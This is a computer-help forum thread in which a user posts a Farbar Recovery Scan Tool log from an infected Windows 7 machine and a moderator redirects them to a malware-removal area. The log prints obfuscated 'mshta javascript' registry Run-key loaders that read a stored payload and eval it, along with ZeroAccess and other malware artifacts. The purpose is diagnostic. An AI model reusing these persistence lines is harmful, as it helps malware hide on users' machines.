Jump to content

Recommended Posts

My Windows 7 OS has just a black screen with the cursor in the middle.  I have tried to launch it in safe mode and everything else that all the other forums suggested but nothing is working.  I found another topic on this site that had information that was for that specific computer so now that I have downloaded the Farbar tool and scanned the infected computer I don't know what the next step is... If anyone could offer some help it would be greatly appreciated.  If I am not going about this the right way then I apologize, but I really don't know what else to do.

 

Here are the results of the Farbar scan:

 

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version:10-09-2015 01
Ran by SYSTEM on MININT-ITIPCP2 (11-09-2015 13:56:44)
Running from F:\
Platform: Windows 7 Home Premium (X64) Language: English (United States)
Internet Explorer Version 9
Boot Mode: Recovery
Default: ControlSet003
ATTENTION!:=====> If the system is bootable FRST must be run from normal or Safe mode to create a complete log.
 
 
==================== Registry (Whitelisted) ===========================
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
 
HKLM-x32\...\Run: [**246c6654<*>] => mshta javascript:cVyqLD8C="jHu";m1w=new%20ActiveXObject("WScript.Shell");Fko57OhUa="6HIAubL9";GvG7H0=m1w.RegRead("HKLM\\software\\Wow6432Node\\24f0a094b5\\5abff29d");gWw3DEE6A="8P";eval(GvG7H0);dqi3qj (the data entry has 14 more characters). <===== ATTENTION (Value Name with invalid characters)
HKLM-x32\...\runonceex: [] => [X]
Winlogon\Notify\GoToAssist: C:\Program Files (x86)\Citrix\GoToAssist\514\G2AWinLogon_x64.dll [X]
Winlogon\Notify\igfxcui: C:\Windows\system32\igfxdev.dll (Intel Corporation)
HKLM\...\Policies\Explorer\Run: [**54c488f2<*>] => mshta javascript:Cmg9jOg1L="aRy";Jv59=new%20ActiveXObject("WScript.Shell");VXHzZ7iNp="70";Y5FOj6=Jv59.RegRead("HKLM\\software\\Wow6432Node\\24f0a094b5\\5abff29d");U7GKiyKah="tTM";eval(Y5FOj6);TMpv1GcW (the data entry has 11 more characters). <===== ATTENTION (Value Name with invalid characters)
HKU\WTs Guns\...\Run: [**246c6654<*>] => mshta javascript:S94NqkIF="XzZ";NS30=new%20ActiveXObject("WScript.Shell");us6ac2cD="qu8dA";inUD1=NS30.RegRead("HKCU\\software\\24f0a094b5\\5abff29d");RxBDrj63b="FnsGPu2";eval(inUD1);vmqshgn8k8="wv6dzj (the data entry has 5 more characters). <===== ATTENTION (Value Name with invalid characters)
HKU\WTs Guns\...\RunOnce: [*0d4fdb] => C:\b0d4fdb4\b0d4fdb4.exe [355840 2015-08-31] (MUKPOCOT)
HKU\WTs Guns\...\RunOnce: [*0d4fdb4] => C:\Users\WTs Guns\AppData\Roaming\b0d4fdb4.exe
HKU\WTs Guns\...\RunOnce: [CryptoUpdate] => C:\Windows\system32\regsvr32.exe /s "C:\Users\WTs Guns\AppData\Roaming\Microsoft\Crypto\RSA\cert_v65552_0.tpl"
AppInit_DLLs: C:\PROGRA~2\WI3C8A~1\Datamngr\x64\datamngr.dll => No File
AppInit_DLLs:  C:\PROGRA~2\WI3C8A~1\Datamngr\x64\IEBHO.dll => No File
Startup: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dell Dock First Run.lnk [2010-03-06]
ShortcutTarget: Dell Dock First Run.lnk -> C:\Program Files\Dell\DellDock\DellDock.exe (Stardock Corporation)
Startup: C:\Users\Default User\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dell Dock First Run.lnk [2010-03-06]
ShortcutTarget: Dell Dock First Run.lnk -> C:\Program Files\Dell\DellDock\DellDock.exe (Stardock Corporation)
Startup: C:\Users\QBDataServiceUser18\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dell Dock First Run.lnk [2010-04-30]
ShortcutTarget: Dell Dock First Run.lnk -> C:\Program Files\Dell\DellDock\DellDock.exe (Stardock Corporation)
Startup: C:\Users\QBDataServiceUser20\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dell Dock First Run.lnk [2010-05-27]
ShortcutTarget: Dell Dock First Run.lnk -> C:\Program Files\Dell\DellDock\DellDock.exe (Stardock Corporation)
Startup: C:\Users\QBDataServiceUser24\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dell Dock First Run.lnk [2014-03-07]
ShortcutTarget: Dell Dock First Run.lnk -> C:\Program Files\Dell\DellDock\DellDock.exe (Stardock Corporation)
BootExecute: autocheck autochk * C:\PROGRA~2\AVG\AVG2012\avgrsa.exe /sync /restart
 
==================== Services (Whitelisted) ========================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
S4 AdobeActiveFileMonitor11.0; C:\Program Files (x86)\Adobe\Elements 11 Organizer\PhotoshopElementsFileAgent.exe [171600 2012-09-17] (Adobe Systems Incorporated)
S4 avgwd; C:\Program Files (x86)\AVG\AVG2012\avgwdsvc.exe [193288 2012-02-14] (AVG Technologies CZ, s.r.o.)
S2 googleupdate; C:\Windows\bswiWxhdyvnHhyL.exe [512000 2015-05-20] ()
S4 QuickBooksDB18; C:\Program Files (x86)\Intuit\QuickBooks 2008\QBDBMgrN.exe [128536 2006-09-13] (iAnywhere Solutions, Inc.)
S3 QuickBooksDB20; C:\Program Files (x86)\Intuit\QuickBooks 2010\QBDBMgrN.exe [678912 2009-08-17] (Intuit, Inc.)
S3 QuickBooksDB24; C:\Program Files (x86)\Intuit\QuickBooks 2014\QBDBMgrN.exe [679936 2013-12-02] (Intuit, Inc.)
S4 vToolbarUpdater18.0.0; C:\Program Files (x86)\Common Files\AVG Secure Search\vToolbarUpdater\18.0.0\ToolbarUpdater.exe [1759768 2014-03-02] (AVG Secure Search)
S2 PccNTUpd; "C:\Program Files (x86)\Trend Micro\OfficeScan Client\PccNTUpd.exe" -service [X]
 
===================== Drivers (Whitelisted) ==========================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
S0 AVGIDSHA; C:\Windows\System32\DRIVERS\avgidsha.sys [28480 2012-04-19] (AVG Technologies CZ, s.r.o. )
S1 Avgldx64; C:\Windows\System32\DRIVERS\avgldx64.sys [307040 2012-11-08] (AVG Technologies CZ, s.r.o.)
S1 Avgmfx64; C:\Windows\System32\DRIVERS\avgmfx64.sys [47696 2011-12-23] (AVG Technologies CZ, s.r.o.)
S0 Avgrkx64; C:\Windows\System32\DRIVERS\avgrkx64.sys [36944 2012-01-31] (AVG Technologies CZ, s.r.o.)
S1 avgtp; C:\Windows\system32\drivers\avgtpx64.sys [50976 2014-03-02] (AVG Technologies)
S3 ebdrv; C:\Windows\system32\DRIVERS\evbda.sys [3286016 2009-06-10] (Broadcom Corporation)
S0 Lbd; C:\Windows\System32\DRIVERS\Lbd.sys [69376 2012-07-24] (Lavasoft AB)
S0 PxHlpa64; C:\Windows\System32\Drivers\PxHlpa64.sys [56336 2012-08-09] (Corel Corporation)
S3 Lavasoft Kernexplorer; \??\C:\Program Files (x86)\Lavasoft\Ad-Aware\KernExplorer64.sys [X]
S1 SBRE; \??\C:\Windows\system32\drivers\SBREdrv.sys [X]
 
==================== NetSvcs (Whitelisted) ===================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
 
==================== One Month Created files and folders ========
 
(If an entry is included in the fixlist, the file/folder will be moved.)
 
2015-09-11 13:56 - 2015-09-11 13:56 - 00000000 ____D C:\FRST
2015-09-06 06:33 - 2015-09-06 06:33 - 00000000 ____D C:\ProgramData\YojaWifo
2015-09-06 06:32 - 2015-09-06 06:34 - 00000157 _____ C:\Users\WTs Guns\AppData\Local\svcxdcl32.dat
2015-09-06 06:32 - 2015-09-06 06:32 - 00358400 _____ C:\Users\WTs Guns\AppData\Local\svcxdcl32.exe
2015-09-01 12:59 - 2015-09-07 13:29 - 00000504 ____H C:\Windows\Tasks\35eff4f8f3fd23f10907f307.job
2015-09-01 12:59 - 2015-09-07 11:14 - 00000382 ____H C:\Windows\Tasks\CryptoUpdate.job
2015-09-01 12:59 - 2015-09-07 10:44 - 00002962 _____ C:\Windows\System32\Tasks\CryptoUpdate
2015-09-01 12:59 - 2015-09-01 12:59 - 00003084 _____ C:\Windows\System32\Tasks\35eff4f8f3fd23f10907f307
2015-08-31 11:49 - 2015-08-31 11:49 - 00000000 ____D C:\Users\WTs Guns\AppData\Local\Google
2015-08-31 05:23 - 2015-08-31 05:23 - 00000000 ___HD C:\b0d4fdb4
2015-08-31 04:26 - 2015-08-31 04:26 - 00004096 _____ C:\ProgramData\hTew6txG06C4.dll
2015-08-31 04:24 - 2015-08-31 04:24 - 00004096 _____ C:\ProgramData\p2hbAwRM06C4.dll
2015-08-29 06:23 - 2015-08-29 06:24 - 00000000 ___HD C:\ProgramData\{9A88E103-A20A-4EA5-8636-C73B709A5BF8}
2015-08-28 04:07 - 2015-08-28 04:07 - 00000000 ____D C:\Users\WTs Guns\AppData\Local\Upvhmedia
2015-08-28 04:07 - 2015-08-28 04:07 - 00000000 ____D C:\Users\WTs Guns\AppData\Local\Okrics
2015-08-18 05:14 - 2015-08-28 04:47 - 00000000 ____D C:\Program Files (x86)\Mozilla Firefox
 
==================== One Month Modified files and folders ========
 
(If an entry is included in the fixlist, the file/folder will be moved.)
 
2015-09-11 09:23 - 2012-07-24 08:48 - 00026142 _____ C:\Windows\setupact.log
2015-09-11 09:23 - 2009-07-13 21:08 - 00000006 ____H C:\Windows\Tasks\SA.DAT
2015-09-11 08:50 - 2009-07-13 21:13 - 00797996 _____ C:\Windows\System32\PerfStringBackup.INI
2015-09-11 08:19 - 2012-07-24 07:45 - 00000830 _____ C:\Windows\Tasks\Adobe Flash Player Updater.job
2015-09-11 08:15 - 2009-07-13 20:45 - 00022464 ____H C:\Windows\System32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2015-09-11 08:15 - 2009-07-13 20:45 - 00022464 ____H C:\Windows\System32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2015-09-09 09:57 - 2012-07-24 08:49 - 00089564 _____ C:\Windows\WindowsUpdate.log
2015-09-09 09:43 - 2010-10-05 07:08 - 00000000 ____D C:\Windows\pss
2015-09-02 09:30 - 2013-06-25 10:30 - 00079360 ___SH C:\Users\WTs Guns\Downloads\Thumbs.db
2015-09-02 09:30 - 2012-10-03 08:53 - 00000000 ____D C:\Users\WTs Guns\Desktop\shop Pics
2015-08-28 04:47 - 2012-07-24 08:48 - 00279972 _____ C:\Windows\PFRO.log
2015-08-28 04:47 - 2012-05-03 04:02 - 00000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2015-08-28 04:34 - 2012-07-24 07:45 - 00778440 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerApp.exe
2015-08-28 04:34 - 2012-07-24 07:45 - 00003768 _____ C:\Windows\System32\Tasks\Adobe Flash Player Updater
2015-08-28 04:34 - 2011-05-24 12:43 - 00142536 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerCPLApp.cpl
2015-08-19 12:48 - 2013-11-01 07:28 - 00002426 _____ C:\Users\WTs Guns\Desktop\IMS V6.lnk
2015-08-12 10:10 - 2013-04-09 10:33 - 00122368 ___SH C:\Users\WTs Guns\Desktop\Thumbs.db
 
ZeroAccess:
C:\Windows\Installer\{21d795b1-cb65-1fe9-782f-dd55be9fe90a}
C:\Windows\Installer\{21d795b1-cb65-1fe9-782f-dd55be9fe90a}\U\80000000.@
C:\Windows\Installer\{21d795b1-cb65-1fe9-782f-dd55be9fe90a}\U\80000032.@
C:\Windows\Installer\{21d795b1-cb65-1fe9-782f-dd55be9fe90a}\U\80000064.@
C:\Windows\Installer\{21d795b1-cb65-1fe9-782f-dd55be9fe90a}\L\00000004.@
C:\Windows\Installer\{21d795b1-cb65-1fe9-782f-dd55be9fe90a}\L\1afb2d56
C:\Windows\Installer\{21d795b1-cb65-1fe9-782f-dd55be9fe90a}\L\201d3dde
 
ZeroAccess:
C:\Users\WTs Guns\AppData\Local\{21d795b1-cb65-1fe9-782f-dd55be9fe90a}
 
Files to move or delete:
====================
C:\ProgramData\hTew6txG06C4.dll
C:\ProgramData\p2hbAwRM06C4.dll
C:\Users\WTs Guns\aaaaaaaa.exe
 
 
Some files in TEMP:
====================
C:\Users\WTs Guns\AppData\Local\Temp\3fffb56d-6b40-4cd3-b5fb-0ac36bf72961.exe
C:\Users\WTs Guns\AppData\Local\Temp\6013073.exe
C:\Users\WTs Guns\AppData\Local\Temp\76FA.tmp.exe
C:\Users\WTs Guns\AppData\Local\Temp\Abspdf.exe
C:\Users\WTs Guns\AppData\Local\Temp\acfpdfu.dll
C:\Users\WTs Guns\AppData\Local\Temp\acfpdfuamd64.dll
C:\Users\WTs Guns\AppData\Local\Temp\acfpdfui.dll
C:\Users\WTs Guns\AppData\Local\Temp\acfpdfuia64.dll
C:\Users\WTs Guns\AppData\Local\Temp\acfpdfuiamd64.dll
C:\Users\WTs Guns\AppData\Local\Temp\acfpdfuiia64.dll
C:\Users\WTs Guns\AppData\Local\Temp\ApnStub.exe
C:\Users\WTs Guns\AppData\Local\Temp\avguidx.dll
C:\Users\WTs Guns\AppData\Local\Temp\C07A.tmp.exe
C:\Users\WTs Guns\AppData\Local\Temp\cdintf.dll
C:\Users\WTs Guns\AppData\Local\Temp\CommonInstaller.exe
C:\Users\WTs Guns\AppData\Local\Temp\csrsss.exe
C:\Users\WTs Guns\AppData\Local\Temp\docviewe.exe
C:\Users\WTs Guns\AppData\Local\Temp\install_flash_player_18_active_x.exe
C:\Users\WTs Guns\AppData\Local\Temp\jre-6u33-windows-i586-iftw.exe
C:\Users\WTs Guns\AppData\Local\Temp\jre-6u37-windows-i586-iftw.exe
C:\Users\WTs Guns\AppData\Local\Temp\jre-6u39-windows-i586-iftw.exe
C:\Users\WTs Guns\AppData\Local\Temp\jre-7u17-windows-i586-iftw.exe
C:\Users\WTs Guns\AppData\Local\Temp\jre-7u40-windows-i586-iftw.exe
C:\Users\WTs Guns\AppData\Local\Temp\jre-7u45-windows-i586-iftw.exe
C:\Users\WTs Guns\AppData\Local\Temp\jre-7u51-windows-i586-iftw.exe
C:\Users\WTs Guns\AppData\Local\Temp\MachineIdCreator.exe
C:\Users\WTs Guns\AppData\Local\Temp\oi_{2D24F029-B2B5-4807-A2F5-C3CDF78AE31D}.exe
C:\Users\WTs Guns\AppData\Local\Temp\PDFPRT400.exe
C:\Users\WTs Guns\AppData\Local\Temp\readSTILog.dll
C:\Users\WTs Guns\AppData\Local\Temp\ToolbarInstaller.exe
C:\Users\WTs Guns\AppData\Local\Temp\UNINSTALL.EXE
C:\Users\WTs Guns\AppData\Local\Temp\xmllite.dll
 
 
==================== Known DLLs (Whitelisted) =========================
 
 
==================== Bamital & volsnap =================
 
(There is no automatic fix for files that do not pass verification.)
 
C:\Windows\System32\winlogon.exe => MD5 is legit
C:\Windows\System32\wininit.exe => MD5 is legit
C:\Windows\SysWOW64\wininit.exe => MD5 is legit
C:\Windows\explorer.exe => MD5 is legit
C:\Windows\SysWOW64\explorer.exe => MD5 is legit
C:\Windows\System32\svchost.exe => MD5 is legit
C:\Windows\SysWOW64\svchost.exe => MD5 is legit
C:\Windows\System32\services.exe => MD5 is legit
C:\Windows\System32\User32.dll => MD5 is legit
C:\Windows\SysWOW64\User32.dll => MD5 is legit
C:\Windows\System32\userinit.exe => MD5 is legit
C:\Windows\SysWOW64\userinit.exe => MD5 is legit
C:\Windows\System32\rpcss.dll => MD5 is legit
C:\Windows\System32\dnsapi.dll => MD5 is legit
C:\Windows\SysWOW64\dnsapi.dll => MD5 is legit
C:\Windows\System32\Drivers\volsnap.sys => MD5 is legit
 
==================== Restore Points =========================
 
 
==================== Memory info =========================== 
 
Percentage of memory in use: 11%
Total physical RAM: 6108.98 MB
Available physical RAM: 5384.06 MB
Total Virtual: 6107.13 MB
Available Virtual: 5387.99 MB
 
==================== Drives ================================
 
Drive c: (OS) (Fixed) (Total:683.95 GB) (Free:469.29 GB) NTFS
Drive f: (USB20FD) (Removable) (Total:7.51 GB) (Free:7.5 GB) FAT32
Drive x: (Boot) (Fixed) (Total:0.03 GB) (Free:0.03 GB) NTFS
Drive y: (RECOVERY) (Fixed) (Total:14.65 GB) (Free:9.24 GB) NTFS ==>[system with boot components (obtained from reading drive)]
 
==================== MBR & Partition Table ==================
 
========================================================
Disk: 0 (Size: 698.6 GB) (Disk ID: 78033E78)
Partition 1: (Not Active) - (Size=39 MB) - (Type=DE)
Partition 2: (Active) - (Size=14.6 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=683.9 GB) - (Type=07 NTFS)
 
========================================================
Disk: 1 (Size: 7.5 GB) (Disk ID: 04DD5721)
Partition 1: (Active) - (Size=7.5 GB) - (Type=0C)
 
 
LastRegBack: 2015-09-11 08:32
 
==================== End of FRST.txt ============================
Link to post
Share on other sites

Hello and Welcome to Malwarebytes

We are not permitted to work on possible malware-related issues here in this section of the forum.

Such work is conducted in a special forum area reserved for that purpose, or at the help desk.

Being that you are probably infected, feel free to follow the instructions below to receive free, one-on-one expert assistance in checking your system and clearing out any infections and correcting any damage done by the malware.

Please see the following pinned topic which has information on how to get help with this: Available Assistance for Possibly Infected Computers

Thank you

Link to post
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now
  • Recently Browsing   0 members

    • No registered users viewing this page.
Back to top
×
×
  • Create New...

Important Information

This site uses cookies - We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.